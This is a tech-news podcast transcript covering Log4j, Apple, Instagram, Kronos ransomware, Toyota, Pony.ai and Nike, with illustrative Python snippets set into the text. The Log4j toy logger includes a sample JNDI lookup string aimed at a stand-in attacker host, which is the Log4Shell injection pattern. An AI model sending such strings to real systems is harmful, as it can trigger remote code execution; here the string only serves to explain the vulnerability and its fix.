Speaker 1: Welcome to TechStuff, a production from iHeartRadio.

Hey there, and welcome to TechStuff. I'm your host, Jonathan Strickland. I'm an executive producer with iHeartRadio, and I love all things tech. This is the tech news for Tuesday, December 14, 2021. Let's get to it. Last week, security experts revealed the discovery of a zero-day vulnerability in Apache Log4j. Now, that is a Java-based utility that, as the name suggests, logs data, and tons of apps and organizations use it to help log data. I mean, data, as we all know, is worth a lot of money, but it's only worth money if you can do stuff with it, and tools such as Log4j are meant to record and organize data in ways that make it useful. But the vulnerability is a doozy. It allows for remote code execution, which is security talk meaning that if you exploit that vulnerability, you can use it to infiltrate someone else's machine and get that machine to execute code of your choice, and thus potentially infect it with malware that you have, you know, delivered to it.
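The remote code execution path described above can be sketched with a toy logger. This is a hedged illustration in Python, not Log4j itself, and every name in it (`resolve_lookup`, `vulnerable_log`, `patched_log`) is invented for the example. The shape of the bug is what matters: the vulnerable logger interprets `${...}` lookup tokens found inside the very strings it is asked to log, so attacker-controlled input becomes an instruction, while the patched version treats log messages as inert text, which is essentially what the Log4j fix amounts to.

```python
# Toy model of the Log4Shell pattern (not real Log4j code).

import os

def resolve_lookup(token: str) -> str:
    # Real Log4j supported lookups like ${jndi:ldap://...}, which could
    # fetch and run attacker-supplied code. Here we only simulate a
    # harmless ${env:...} lookup and stub everything else.
    kind, _, arg = token.partition(":")
    if kind == "env":
        return os.environ.get(arg, "")
    return f"<would dereference {kind}:{arg}>"  # the dangerous step

def vulnerable_log(message: str) -> str:
    # Expands lookups even when they arrive inside untrusted user input.
    out = message
    while "${" in out:
        start = out.index("${")
        end = out.index("}", start)
        out = out[:start] + resolve_lookup(out[start + 2:end]) + out[end + 1:]
    return out

def patched_log(message: str) -> str:
    # The fix, in spirit: treat the message as plain text, no lookups.
    return message

user_input = "${jndi:ldap://attacker.example/a}"
print(vulnerable_log("User-Agent: " + user_input))  # lookup fires
print(patched_log("User-Agent: " + user_input))     # logged verbatim
```

The patched behavior mirrors the real-world mitigations of the time, which disabled message lookups entirely, so logging a hostile string just records it instead of acting on it.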
So this is kind of like an open gateway for hackers, who can use it to infect target systems with something really nasty. Services that rely on Log4j include some really big ones out there. There's a Java version of Minecraft that uses it, for example. Platforms like Twitter use it. Major services like Cloudflare, which provides things like distributed denial of service mitigation for companies, use it. So this is a major problem. It's been called the worst security vulnerability in years, like in a decade, and it's going to require companies to patch servers quickly to mitigate the damage that's already being done. Because here's the thing: the world at large wasn't really made aware of this vulnerability until Thursday, December 9, 2021, but the bad guys surely knew about it before then and had been working on ways to infiltrate different target servers. Now, the fix, as fixes go, is relatively simple, but the scale at which it must be rolled out means that even a simple task can be a huge endeavor.
Meanwhile, the thing keeping IT pros up at night is that the next several weeks will be spent trying to determine which servers may have been compromised and by whom. CNN reports that Chinese hackers, potentially backed by the Chinese government, are using this vulnerability to penetrate target computer systems. Right now, the US Occupational Safety and Health Administration, a.k.a. OSHA, has launched an investigation into Apple, and at the heart of the matter is an accusation from a former Apple employee who says that the company retaliated against her after she filed labor complaints against Apple and participated in public criticism of the company. So now OSHA is going to investigate Apple to see if those accusations hold water. This is another component of the ongoing movement within Apple, one in which a growing number of employees and former employees have come forward to share stories about a seemingly toxic work culture. I might need to do an episode about this before too long. I have a theory that the Steve Jobs era at Apple kind of set up a culture that could be pretty brutal at times.
Jobs himself had a famous reputation for being a really, really harsh taskmaster, and in fact, people would sometimes refer to getting fired at Apple as getting "Jobsed," because he was known for having angry outbursts in which he would fire people. And my guess is that that contributed to a culture that was not particularly healthy, but during the Jobs era, no one was comfortable speaking out about it. Now, years after Jobs has passed away, it looks to me like the company culture is slowly kind of falling away from that era. And now employees, particularly employees who may not have even worked during the Jobs era, but who have, let's say, more empowered ideas of what being an employee is, are starting to bring these issues to light, and the company is kind of flailing in its responses. Now, I think that the employees coming forward is a good thing. I think anytime we see organizations being held accountable for the working conditions at that organization, that's a good thing. I think it's unfortunate that Apple appears to have engaged in retaliatory practices.
If that, in fact, is what OSHA discovers, the company could end up facing some pretty serious fines. You know, in the old days of the web, it was not unusual to see people rush out to register domain names in an attempt to squat on them and then sell them off later. The whole idea being: if I can get that domain name, then in the future, the company that exists is going to want it, and they're gonna have to pay me to get off their land, essentially. So you might run out and buy something like Levis.com, hoping that the Levi's jeans company would ultimately come up to you and say, "Hey, buddy, clear off, here's, you know, ten thousand bucks, give us the name." However, squatting is certainly not what Thea-Mai Baumann was doing when she created an Instagram account with the handle @metaverse. She was not trying to jump ahead of Meta slash Facebook or anything, unless she's able to see well into the future, because she has held that @metaverse Instagram account for a decade. At least she did until November 2 of this year.
That's when Instagram blocked her account, and all she got was an explanation that she was, quote, "pretending to be someone else," end quote. By the way, that was not like a targeted message to her. That was an automated message, a "here's why your account has been blocked." And that's still pretty rich, because she had held that account for a decade. But Meta slash Facebook has big plans to create a metaverse, and that company, you know, happens to own Instagram. So I think this was less of a "you're pretending to be someone else, so now we're punishing you," and more of a "we own this, and we're going to engage in a little eminent-domain virtual land grab here. That handle belongs to us now." And in a way, I get it. I mean, I get that the company wants to own and control the handle for something that they're really planning on being a big thing, like the future of the company.
However, it is more than a little bit of a lousy move to issue a statement to a ten-year-old account saying that the account is violating rules by pretending to be someone else, because there was no someone else to pretend to be ten years ago. I mean, clearly this is not the case. Baumann had used the account to promote her art and her business, which changed over the years, but that's what she kept using it for. She had never made any sort of claim that she was actually a Facebook plan from the future, so it's a pretty crappy move on Meta's part. In fact, if she had been using the account for ten years, like if she literally made it ten years ago, that would mean she created the Instagram account before Facebook had even bought Instagram. That happened in 2012. Anyway, my hope is that the company will make good with Baumann at some point, or at least give her access to all the stuff that she posted over that time period. I mean, I get that you want to control the @metaverse handle, but this approach was so clumsy and inaccurate that it's infuriating.
One of the stories I've covered this year has been the right to repair movement, in which advocates are pushing lawmakers to create rules that would require companies to make it possible for, you know, people to repair their own stuff, or to bring their stuff to any repair shop that they want, instead of being forced toward a company-operated or company-licensed business. And we've seen this with all kinds of technology, from consumer electronics like smartphones and laptops to farming tractors. John Deere is infamous for this stuff. Well, now Microsoft is adding features that make repairs on Surface laptops a little more accessible. Microsoft is partnering with iFixit.com, and Microsoft is going to offer its service tools for sale through iFixit. It's not quite at the point where the end user is going to be able to go out and get these specialty tools. So if you're not, like, running a repair shop or whatever, you're not going to run out and grab these just so that you have them in your tool chest at home.
However, it does mean that people who are independent repair shop owners will be able to get the official tools for themselves. So it's a small step toward breaking out of that siloed approach to repairs. And if you're wondering why companies even do this in the first place, the answer is money. A company can only sell you a specific laptop once, right? They sell it to you, you bought it, that's it. They can sell another one to you down the line, but the transaction for that one computer, that's over. Well, if the company can guarantee that it is the only entity that can offer maintenance and repairs, or that it will only extend that capability to repair shops that will pay a hefty licensing fee back to the company for that privilege, well, then that means the company can keep making money off of a single sale indefinitely, for as long as, you know, you continue to use it and bring it in for maintenance and repairs. All right, we have some more stories for this episode, but before we get to that, let's take a quick break.

We're back. All right.
The company Kronos, that's K-R-O-N-O-S, announced that it was hit with a ransomware attack from hackers. Specifically, the hackers targeted the Kronos Private Cloud, and that houses a suite of HR tools that other companies use. So Kronos is a company that provides HR services to clients, so other companies that have chosen to outsource their HR functions. That's bad news for Kronos customers, because there's an outage now, and some of them have found it impossible to perform HR functions like issuing payroll. That means employees at those companies will not get paid on time, and that's always a hardship. It's particularly tough during the holidays. UKG, the parent company of Kronos, hasn't revealed many details about the ransomware attack, such as what group was behind it, nor do we know anything about the company's plan to respond to the attack and whether or not they intend to pay off the ransom. Once again, paying ransomware, that tends to be the worst idea, because it justifies the ransomware attacks in the first place.
If the attacks weren't profitable, hackers wouldn't use them, right? But paying off hackers pretty much ensures that future attacks will follow. That being said, it is hard to advocate a stiff-upper-lip approach when so many small businesses are in a holding pattern when it comes to stuff like, you know, doing their payroll. That's a real issue. In fact, I would argue that's exactly why the hackers targeted something like Kronos, because, especially with the timing, the company is under tremendous pressure. There are all these people and organizations that depend upon those services, and that's what, you know, puts the squeeze on the company to try and convince them to pay the ransom. So, you know, it's a super tough situation, and I don't know, I don't know what I would do if I were in the position of having to make decisions at Kronos.
Okay, imagine for a moment that you have a piece of technology that has a convenience feature, and it's one that you depend upon on occasion, and then one day the feature stops working, and then you find out you can regain the use of that feature, but only if you pay a subscription fee. That's kind of what some Toyota vehicle owners have started to experience recently. It's part of the Remote Connect suite of features, and Remote Connect includes a bunch of conveniences like remote locks, preheating a vehicle remotely, or remote-starting a vehicle. And it's that last one, the remote start, that has stopped working for some Toyota owners. And there are reasons why I want to say that this is super tricky. All right, so Toyota owners who have a 2018 or newer vehicle can opt to have remote start as part of the Remote Connect features. It's lumped in with some other features that you can get with certain Toyota vehicles. However, those features are also part of a three-year trial, so you have free use of those for three years.
But then, once you've owned the car for three years or longer, that trial comes to an end, and the remote start feature stops working, along with all the other Remote Connect features that are part of that suite. But here's the weird thing. See, a lot of Remote Connect features involve Toyota sending information to the car, right? So these are features that depend upon Toyota's back end, so you can see why there's a subscription fee, right? You have to pay the company to maintain and operate those back-end services. But remote start doesn't require that. It's all local. It's RF-based, radio frequency-based. That means it's just radio waves coming from the key fob to the car, sending a message to remote-start the vehicle. There is no interfacing with Toyota's back-end system at all. So, in other words, the capability is actually built into the car and into the key fob, but Toyota is disabling that feature unless owners subscribe to the Remote Connect service. That's eight bucks a month or eighty dollars a year.
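As a rough sketch of that gating (assumed behavior, not Toyota's actual firmware), the key fob's RF command can reach the car with no network involved, and yet the car's software can still refuse to act on it based on a locally stored subscription flag. All the names here are invented for the illustration.

```python
# Toy model: a locally delivered RF command gated by a cached
# subscription flag. Illustrative only; not Toyota's implementation.

class Car:
    def __init__(self, remote_connect_active: bool):
        # The flag would be set or cleared via the manufacturer's back
        # end, but once cached, checking it needs no network at all.
        self.remote_connect_active = remote_connect_active
        self.engine_running = False

    def receive_rf_command(self, command: str) -> str:
        # The radio message arrives directly from the key fob.
        if command != "remote_start":
            return "ignored"
        if not self.remote_connect_active:
            # Capability is physically present but disabled in software.
            return "blocked: subscription required"
        self.engine_running = True
        return "engine started"

subscribed = Car(remote_connect_active=True)
lapsed = Car(remote_connect_active=False)
print(subscribed.receive_rf_command("remote_start"))  # engine started
print(lapsed.receive_rf_command("remote_start"))      # blocked: subscription required
```

The design choice being criticized is visible in the sketch: nothing about the command path requires a server, only the flag check stands between the fob and the engine.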
Now, one silver lining here is that if you own a Toyota from before 2018 that still has remote start, you aren't affected. Now, this isn't altruism on Toyota's part. It's rather, you know, self-preservation and practicality, because those cars depend upon 3G receivers. That's how they receive information from Toyota: it comes in through the cellular network. But cellular companies are dismantling their 3G networks. That means those cars will no longer be able to be part of the Remote Connect ecosystem at all, because they won't be able to receive messages from Toyota itself. Those messages will be sent via LTE or later, so the cars will not be able to get that info. That means it would be a terrible PR move for Toyota to disable a feature and then force people to subscribe to a service that they otherwise wouldn't be able to use. In other words, it would just be, "Hey, pay us money so you can unlock this locally available technology feature." That would be not great.
Plus, Toyota couldn't really do it, because they wouldn't be able to send the message to disable or enable the feature remotely anyway. You would have to bring the car in to a dealership or something to get that stuff changed. Speaking of Toyota, the company has partnered with another company called Pony.ai. That's a Chinese company working on autonomous car technology. Well, the state of California recently suspended Pony.ai's license. Really, they revoked a permit. By that I mean California has told Pony.ai that it will no longer be allowed to conduct fully autonomous testing on California roads and highways. Now, the reason for that decision is an accident. A vehicle operating under a Pony.ai autonomous system was involved in a single-vehicle accident: it veered into a road center divider. Now, no one was injured in the accident, and there were no other vehicles involved, so as far as accidents go, this was kind of a best-case scenario, but it did mean that California regulators were concerned enough to revoke Pony.ai's permit.
Now, to be clear, Pony.ai will still be able to test vehicles. They just will have to include a safety driver behind the wheel on all tests, so that a human operator could potentially take control should the car prove to be unsafe, make errors, or be headed toward an accident. Now, I've spoken before about how creating a truly fully autonomous vehicle, one that could operate in all conditions that human drivers can operate in, is an enormous challenge, and it's probably gonna take many more years to see something approach that. What we see today are cars that range from having very good driver-assist features to impressive-but-limited self-driving capabilities that only really apply under specific conditions. Meanwhile, Pony.ai has received approval from Beijing to operate an autonomous taxi service, and they were actually in the process of trying to get that same approval from California. Presumably, this incident will put a little bit of a roadblock in the way of that particular, you know, goal. Finally, let's talk about Nike in the metaverse.
Okay, so Nike recently acquired a company called RTFKT Studios. So what does that studio do? Well, mostly it creates stuff like NFTs, that is, non-fungible tokens, which I have frequently referred to as a kind of receipt for something, but not the thing itself. Like, someone could put up a digital image and sell it as an NFT, and if you bought that NFT, you'd have a digital token showing your ownership of that image. But, you know, the digital image is still a file. It's still data, which means it's still something that can be copied and distributed. And yeah, you would have a receipt saying you owned it, or rather, that you owned a specific incarnation of it. Like, maybe it was a limited edition run, one of five hundred, and you've got a little digital certificate saying which one you own. Sure, but that doesn't really mean anything. It's like owning a star. Anyway, RTFKT also makes virtual stuff that could potentially be used in a metaverse of some sort.
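The "receipt, not the thing itself" point can be made concrete with a tiny toy ledger, no blockchain involved; the token name, edition number, and owner names here are all invented for the example. The ledger entry records ownership of one numbered item in an edition, while the image bytes it points at remain an ordinary, freely copyable file.

```python
# Toy NFT-style ledger: ownership of a record about the content,
# not control of the content itself. Purely illustrative.

import hashlib

image_bytes = b"...pretend these are the bytes of a PNG..."
content_hash = hashlib.sha256(image_bytes).hexdigest()

# The "NFT": a ledger entry identifying item 17 of a limited edition,
# pointing at the content by hash and naming an owner.
ledger = {
    ("starry-sneaker", 17): {
        "content_sha256": content_hash,
        "owner": "alice",
    }
}

def transfer(token, new_owner):
    # Only the ledger entry changes hands when the NFT is "sold."
    ledger[token]["owner"] = new_owner

# Meanwhile, anyone can copy the underlying file bit for bit.
pirated_copy = bytes(image_bytes)

transfer(("starry-sneaker", 17), "bob")
print(ledger[("starry-sneaker", 17)]["owner"])  # bob
print(pirated_copy == image_bytes)              # True
```

Transferring the token updates who holds the receipt, but the data it references is unchanged and uncontrolled, which is exactly the gap between owning the NFT and owning the image.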
So, you know, they make stuff like avatars, virtual representations of people, and digital versions of real-world goods. That's another one, and I think that's probably where Nike steps in. I mean, I assume Nike is trying to get ahead of the metaverse game by creating virtual tokens that represent stuff like shoes, so that your virtual avatar in the future can sport virtual Nikes as a virtual status symbol. And all of this makes me just want to run off into the woods for the foreseeable future. Anyway, it looks like this is another sign of a company trying to get ahead of the metaverse trend. Now, my own hope, and this is nothing against Nike, because I actually own some Nikes and I really like them and everything, but my hope is that the whole metaverse push ends up fizzling out, kind of the way VR has despite several real goes at it, because it just seems to me to be a way to digitally enhance all the stuff about humans and capitalism that I think is kind of gross and awful. But hey, I'm well on my way to turning into a grumpy old Luddite, so don't listen to me.
Form your own opinions. Look into it and decide what you think is good or not good. Don't just take my own grouchy approach. I just, I gotta go outside and yell at a passing cloud. And that wraps up the news for Tuesday, December 14, 2021. If you have suggestions for topics I should cover on TechStuff in the future, please reach out to me. The best way to do that is on Twitter. The handle for the show is TechStuffHSW, and I'll talk to you again really soon.

TechStuff is an iHeartRadio production. For more podcasts from iHeartRadio, visit the iHeartRadio app, Apple Podcasts, or wherever you listen to your favorite shows.